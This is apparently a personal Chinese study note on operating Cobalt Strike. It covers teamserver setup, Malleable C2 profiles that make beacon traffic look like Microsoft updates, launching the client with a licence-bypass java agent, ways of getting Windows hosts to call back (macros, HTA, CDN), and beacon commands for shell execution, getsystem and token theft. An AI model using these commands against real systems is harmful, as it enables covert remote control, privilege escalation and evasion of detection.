【笔记】CobaltStrike学习笔记

前言

Software for Adversary Simulations and Red Team Operations（官网）

启动服务端

<ip>：当前服务端IP地址
<password>：连接密码

./teamserver <ip> <password>

teamserver内提供的启动参数

-Dcobaltstrike.server_port=50050：指定端口号，默认为50050
-Dcobaltstrike.server_bindto=0.0.0.0：指定监听的IP地址
-Djavax.net.ssl.keyStore=./cobaltstrike.store：指定默认使用的SSL证书
-Djavax.net.ssl.keyStorePassword=Microsoft：指定默认使用的SSL证书密码

通过配置文件启动服务端

<file>.profile：配置文件

./teamserver <ip> <password> <file>.profile

自定义配置文件

修改HTTP请求配置

set uri_x86 ""：指定32位木马请求的URL前缀
set uri_x64 ""：指定64位木马请求的URL前缀
header "key" "value"：指定请求头

http-stager {
    set uri_x86 "/prefix";
    set uri_x64 "/prefix";
    
    client {
        header "key" "value";
    }
}

http-get {
    set uri "/prefix";
}

http-post {
    set uri "/prefix";
}

添加HTTPS请求配置

https-certificate {
    set CN "";
    set O "";
    set C "";
    set L "";
    set OU "";
    set ST "";
    set validity "";
}
code-signer{
    set keystore "<file>.store";
    set password "<password>";
    set alias "<domain>";
}

使用rsmudge/Malleable-C2-Profiles提供的配置文件

下载项目

https://github.com/rsmudge/Malleable-C2-Profiles.git
cd Malleable-C2-Profiles

通过配置文件启动服务端

./teamserver <ip> <password> normal/microsoftupdate_getonly.profile

启动客户端

java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:CSAgent.jar=f38eb3d1a335b252b58bc2acde81b542 -Duser.language=en -jar cobaltstrike.jar

• 主机填写服务端IP地址->用户填写任意用户名，用来在团队协作时区分用户->密码填写服务端密码->连接

Windows上线

• CobaltStrike实现Windows上线
• CobaltStrike使用域名作为上线地址
• CobaltStrike借助跳板机实现Windows上线
• CobaltStrike通过DNS协议实现Windows上线
• CobaltStrike通过Office宏代码实现Windows上线
• CobaltStrike通过HTA文档实现Windows上线
• CobaltStrike通过Web投递实现Windows上线
• CobaltStrike通过CDN实现Windows上线
• CobaltStrike通过腾讯云云函数实现转发器

Beacon相关命令

修改回连间隔

• 回连间隔用于防止被发现，测试阶段可以修改为0秒

• 右键会话->会话操作->回连间隔

• 设置为0->OK

beacon> sleep 0

执行Shell命令

<shell>：Shell命令

beacon> shell <shell>

提权

beacon> getsystem

查看进程

beacon> ps

切换权限

beacon> steal_token <pid>

查看当前用户

beacon> getuid

完成